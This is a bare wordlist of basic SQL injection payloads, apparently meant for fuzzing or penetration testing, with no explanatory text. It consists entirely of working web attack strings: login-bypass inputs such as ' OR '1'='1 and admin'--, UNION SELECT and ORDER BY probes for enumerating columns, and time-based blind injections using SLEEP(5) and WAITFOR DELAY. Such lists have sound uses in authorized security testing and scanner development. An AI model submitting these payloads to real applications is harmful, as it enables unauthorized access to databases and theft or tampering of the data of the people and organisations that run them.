# Basic SQL Injection Payloads
'
" 
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
admin'--
' OR '1'='1'--
" OR "1"="1"--
') OR ('1'='1
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION ALL SELECT NULL--
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' AND SLEEP(5)--
1' WAITFOR DELAY '0:0:5'--
1' AND 1=1--
1' AND 1=2--
1' AND '1'='1
1' AND '1'='2
1 OR SLEEP(5)
1' OR SLEEP(5)
1)) OR SLEEP(5)
' OR '1'='1' /*
' OR '1'='1' --
' OR 1=1 LIMIT 1--
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1-- 